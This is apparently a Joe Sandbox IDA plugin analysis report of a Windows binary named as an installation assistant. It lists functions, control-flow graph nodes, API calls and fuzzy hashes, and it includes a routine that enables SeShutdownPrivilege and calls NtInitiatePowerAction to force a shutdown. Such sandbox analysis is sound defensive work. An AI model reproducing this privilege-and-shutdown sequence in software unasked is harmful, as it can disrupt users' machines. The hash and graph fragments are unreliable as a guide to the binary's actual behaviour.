                              control_flow_graph 7587 6c9dc1ce-6c9dc1ea 7588 6c9dc3a9 7587->7588 7589 6c9dc1f0-6c9dc1f2 7587->7589 7590 6c9dc3ab-6c9dc3af 7588->7590 7591 6c9dc214-6c9dc235 7589->7591 7592 6c9dc1f4-6c9dc207 call 6c9cff4f call 6c9cff3c call 6c9d0690 7589->7592 7593 6c9dc23c-6c9dc242 7591->7593 7594 6c9dc237-6c9dc23a 7591->7594 7609 6c9dc20c-6c9dc20f 7592->7609 7593->7592 7596 6c9dc244-6c9dc249 7593->7596 7594->7593 7594->7596 7598 6c9dc24b-6c9dc257 call 6c9db1d9 7596->7598 7599 6c9dc25a-6c9dc26b call 6c9dc3b0 7596->7599 7598->7599 7607 6c9dc26d-6c9dc26f 7599->7607 7608 6c9dc2ac-6c9dc2be 7599->7608 7612 6c9dc296-6c9dc2a2 call 6c9dc421 7607->7612 7613 6c9dc271-6c9dc279 7607->7613 7610 6c9dc305-6c9dc327 WriteFile 7608->7610 7611 6c9dc2c0-6c9dc2c9 7608->7611 7609->7590 7614 6c9dc329-6c9dc32f GetLastError 7610->7614 7615 6c9dc332 7610->7615 7617 6c9dc2cb-6c9dc2ce 7611->7617 7618 6c9dc2f5-6c9dc303 call 6c9dc833 7611->7618 7621 6c9dc2a7-6c9dc2aa 7612->7621 7619 6c9dc27f-6c9dc28c call 6c9dc7cb 7613->7619 7620 6c9dc33b-6c9dc33e 7613->7620 7614->7615 7622 6c9dc335-6c9dc33a 7615->7622 7624 6c9dc2e5-6c9dc2f3 call 6c9dc9f7 7617->7624 7625 6c9dc2d0-6c9dc2d3 7617->7625 7618->7621 7628 6c9dc28f-6c9dc291 7619->7628 7623 6c9dc341-6c9dc346 7620->7623 7621->7628 7622->7620 7629 6c9dc348-6c9dc34d 7623->7629 7630 6c9dc3a4-6c9dc3a7 7623->7630 7624->7621 7625->7623 7631 6c9dc2d5-6c9dc2e3 call 6c9dc90e 7625->7631 7628->7622 7635 6c9dc34f-6c9dc354 7629->7635 7636 6c9dc379-6c9dc385 7629->7636 7630->7590 7631->7621 7641 6c9dc36d-6c9dc374 call 6c9cff62 7635->7641 7642 6c9dc356-6c9dc368 call 6c9cff3c call 6c9cff4f 7635->7642 7639 6c9dc38c-6c9dc39f call 6c9cff3c call 6c9cff4f 7636->7639 7640 6c9dc387-6c9dc38a 7636->7640 7639->7609 7640->7588 7640->7639 7641->7609 7642->7609
                              APIs
                                • Part of subcall function 6C9DC421: GetConsoleCP.KERNEL32(?,6C9DB640,?), ref: 6C9DC469
                              • WriteFile.KERNEL32(?,?,6C9E4C5C,00000000,00000000,?,00000000,00000000,6C9E6026,00000000,00000000,?,00000000,6C9DB640,6C9E4C5C,00000000), ref: 6C9DC31F
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9E4C5C,6C9DB640,00000000,?,?,?,?,00000000,?), ref: 6C9DC329
                              • __dosmaperr.LIBCMT ref: 6C9DC36E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 91fff7c319815b43e5fc7de76e8f0bf7974e1827695bd5dc5f8676ce6daff155
                              • Instruction ID: a1226c0e613cb48a242c03cf77557eb32a2dab62ed1d8bbf7e04995b23190683
                              • Opcode Fuzzy Hash: 91fff7c319815b43e5fc7de76e8f0bf7974e1827695bd5dc5f8676ce6daff155
                              • Instruction Fuzzy Hash: 9851D571A04A0AAFDF01AFE4C840BDEBBB9FF1A318F168151E510B7A81D731F9458761
                              Function 6C9C6100 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7654 6c9c6100-6c9c610c 7655 6c9c614d 7654->7655 7656 6c9c610e-6c9c6119 7654->7656 7659 6c9c614f-6c9c61c7 7655->7659 7657 6c9c612f-6c9c613c call 6c8901f0 call 6c9d1088 7656->7657 7658 6c9c611b-6c9c612d 7656->7658 7668 6c9c6141-6c9c614b 7657->7668 7658->7657 7660 6c9c61c9-6c9c61f1 7659->7660 7661 6c9c61f3-6c9c61f9 7659->7661 7660->7661 7663 6c9c61fa-6c9c62b9 call 6c892250 call 6c892340 call 6c9c98e9 call 6c88e010 call 6c9c75f8 7660->7663 7668->7659
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C62A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: 8629b1bf6deb482f60a8f4d22c008fbcb20579010eaf468abdca7a73074d1068
                              • Instruction ID: 6a910a071f5964223849e41d897a8f1380f61db8d665e4a49a550d2dd4ee7bff
                              • Opcode Fuzzy Hash: 8629b1bf6deb482f60a8f4d22c008fbcb20579010eaf468abdca7a73074d1068
                              • Instruction Fuzzy Hash: 1F5154B5A00B408FD725CF19C481BA7BBF5BB89308F008A2DD89647B91D775F90ACB91
                              Function 6C9DBE95 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7699 6c9dbe95-6c9dbea9 call 6c9e1b12 7702 6c9dbeaf-6c9dbeb7 7699->7702 7703 6c9dbeab-6c9dbead 7699->7703 7705 6c9dbeb9-6c9dbec0 7702->7705 7706 6c9dbec2-6c9dbec5 7702->7706 7704 6c9dbefd-6c9dbf1d call 6c9e1c8f 7703->7704 7715 6c9dbf1f-6c9dbf29 call 6c9cff62 7704->7715 7716 6c9dbf2b 7704->7716 7705->7706 7708 6c9dbecd-6c9dbee1 call 6c9e1b12 * 2 7705->7708 7709 6c9dbec7-6c9dbecb 7706->7709 7710 6c9dbee3-6c9dbef3 call 6c9e1b12 CloseHandle 7706->7710 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7719 6c9dbef5-6c9dbefb GetLastError 7710->7719 7721 6c9dbf2d-6c9dbf30 7715->7721 7716->7721 7719->7704
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E47CF), ref: 6C9DBEEB
                              • GetLastError.KERNEL32(?,00000000,?,6C9E47CF), ref: 6C9DBEF5
                              • __dosmaperr.LIBCMT ref: 6C9DBF20
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: cc87e99de83f7fb4a060567d010466444c00edf829d5257ba653d545d5ca18a7
                              • Instruction ID: 4932933f50c917f16c6be16ebc7cb676445248cfd206e6bff572262675986b78
                              • Opcode Fuzzy Hash: cc87e99de83f7fb4a060567d010466444c00edf829d5257ba653d545d5ca18a7
                              • Instruction Fuzzy Hash: 4A014833709A1016C305273A9854BAD277D4FA773CF3B8249EA24A7AC2DB60E44441E1
                              Function 6C9D110C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7944 6c9d110c-6c9d1117 7945 6c9d112e-6c9d113b 7944->7945 7946 6c9d1119-6c9d112c call 6c9cff3c call 6c9d0690 7944->7946 7948 6c9d113d-6c9d1152 call 6c9d1229 call 6c9d8cae call 6c9da1d0 call 6c9dbe08 7945->7948 7949 6c9d1176-6c9d117f call 6c9db3e5 7945->7949 7957 6c9d1180-6c9d1182 7946->7957 7963 6c9d1157-6c9d115c 7948->7963 7949->7957 7964 6c9d115e-6c9d1161 7963->7964 7965 6c9d1163-6c9d1167 7963->7965 7964->7949 7965->7949 7966 6c9d1169-6c9d1175 call 6c9d4d2b 7965->7966 7966->7949
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: bae05cffe0643e5839104521c9a2f8faa60b4021aaa9070a42e3ea47c26b413c
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: 02F06237502E146AD7211A799C0068A32A89F63378F13C715E524B2ED0DB64F50AC5E5
                              Function 6C9C5ED0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C6024
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C6064
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 5a9e4a94c1411eee0bebd0f4052571d77d34224ae96bfd90b426351e7a5f79f7
                              • Instruction ID: b8eca85c84fde46796577f3522f68b62daa5c0a44b65f79c7906d32e1393ca49
                              • Opcode Fuzzy Hash: 5a9e4a94c1411eee0bebd0f4052571d77d34224ae96bfd90b426351e7a5f79f7
                              • Instruction Fuzzy Hash: D5512871201B00DBD725CF25C984BE6BBE4BF19714F448A1CE4AA8BB91DB30F549CB82
                              Function 6C9CF4AF Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(6C9F6DF0,0000000C), ref: 6C9CF4C2
                              • ExitThread.KERNEL32 ref: 6C9CF4C9
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 95dab571883078249fc25fa74b806aade8c570673f8b5a8e8d1b1e848463b25d
                              • Instruction ID: 0d34cc00adf37f1694316fdb59943cd724b800d7c34c213a71fb75225bd2a7e0
                              • Opcode Fuzzy Hash: 95dab571883078249fc25fa74b806aade8c570673f8b5a8e8d1b1e848463b25d
                              • Instruction Fuzzy Hash: 2CF0AF71A046019FDB049FB0C448AAE3B74FF61318F258549F116A7B91DF34E905CBA2
                              Function 6C9DB4E2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 71f730a4e8cd326d9d02f9a15e646cfb3ea115d0785c939bafae6ad0be515e36
                              • Instruction ID: c711f14018d6085c3f864e1f0dc6e2359af518b0ac0d21738ec536934d588a39
                              • Opcode Fuzzy Hash: 71f730a4e8cd326d9d02f9a15e646cfb3ea115d0785c939bafae6ad0be515e36
                              • Instruction Fuzzy Hash: CA114C75A0420AAFCF05CF59E9409DB7BF8EF48318F168059F805AB341D671E911CBA4
                              Function 6C9E456E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: 8ab15a9fc089de351eced22394166d37832b04fe7b02a767cdc8418350bff55c
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 49012172C01159AFCF029FE88C01AEE7FB5BF28214F144165F924A2550EB31CA24DF91
                              Function 6C9E49C7 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C9E4685,?,?,00000000,?,6C9E4685,00000000,0000000C), ref: 6C9E49E4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 4f5f8893afa246a1ef9f668a658f2ae6648356e6e550c3f14ca699a21773f9eb
                              • Instruction ID: 3ec6b9916e7ba38a54eccf755b7c6883853a0a5c8ff4c2e8c39d947e3c94be96
                              • Opcode Fuzzy Hash: 4f5f8893afa246a1ef9f668a658f2ae6648356e6e550c3f14ca699a21773f9eb
                              • Instruction Fuzzy Hash: 57D06C3211010DBBDF028E84DD06EDA3BAAFB48725F124000BA2856020C732E861AB90
                              Function 6C897CB0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: cd0237ce4b903c8805b404347cb02d0b22193dc6ec9eccc51d423f740d1babf1
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:

                              Non-executed Functions

                              Function 6C9C1DF0 Relevance: 10.5, APIs: 3, Strings: 1, Instructions: 3538COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: g)''
                              • API String ID: 4218353326-3487984327
                              • Opcode ID: a371c1d19cba26fca4c0d6924495884a7119d4a42889d99f4e63b106e812d03d
                              • Instruction ID: 0b8bb44ff17a7c3ee2a658374861ca5318fcf6298d87ddfa38e71dbdf2eed6fd
                              • Opcode Fuzzy Hash: a371c1d19cba26fca4c0d6924495884a7119d4a42889d99f4e63b106e812d03d
                              • Instruction Fuzzy Hash: B763E131744B018FC728CF28C8D0AA5B7F3BF953187298A6DC4A64BA55E774F54ACB42
                              Function 6C9C62D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6C9C62DA
                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C9C62E6
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C9C62F4
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C9C631B
                              • NtInitiatePowerAction.NTDLL ref: 6C9C632F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3256374457-3733053543
                              • Opcode ID: 9e9d7f21a43b7d09fcf8e4f86ed584d21c1aeba51abe26806921e2f2cb1f2128
                              • Instruction ID: 79aee4bf63020e93d76aa6a4cd4e2fe8821aa2ec8d2539d400b8e8478ad9b694
                              • Opcode Fuzzy Hash: 9e9d7f21a43b7d09fcf8e4f86ed584d21c1aeba51abe26806921e2f2cb1f2128
                              • Instruction Fuzzy Hash: 7DF0B470648305BBEB107B24CD0EBAA7BB8FF45701F018508F981A61C1D770AA85CB96
                              Function 6C841950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: \j`7$\j`7$j
                              • API String ID: 0-3644614255
                              • Opcode ID: a538792fde0a03e75c9359e1431f259bd2183b63f89c2c2b6b1258e523f3c5db
                              • Instruction ID: 559866e9cd0c6f3213e84daf3e60d428d248d4a7381e3fd7891f36c9d5fea3c6
                              • Opcode Fuzzy Hash: a538792fde0a03e75c9359e1431f259bd2183b63f89c2c2b6b1258e523f3c5db
                              • Instruction Fuzzy Hash: A742237460938A8FCB24CF68C58066ABBE1BBC9354F148E1EE495C7761D338E855CB53
                              Function 6CA584AC Relevance: 8.7, APIs: 1, Strings: 3, Instructions: 1656COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA584B1
                                • Part of subcall function 6CA5993B: __EH_prolog.LIBCMT ref: 6CA59940
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 587ea0ec657757d328f40d1afe1e55b897992791714bbfe00bc23620a1ab3cfa
                              • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction Fuzzy Hash: 40F28E70D01248DFDB11CFA8C988BDDBBB5AF49308F288499E449EB791D7319A86CF11
                              Function 6CA4AEEF Relevance: 8.3, APIs: 1, Strings: 2, Instructions: 3058COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA4AEF4
                                • Part of subcall function 6CA4E622: __EH_prolog.LIBCMT ref: 6CA4E627
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
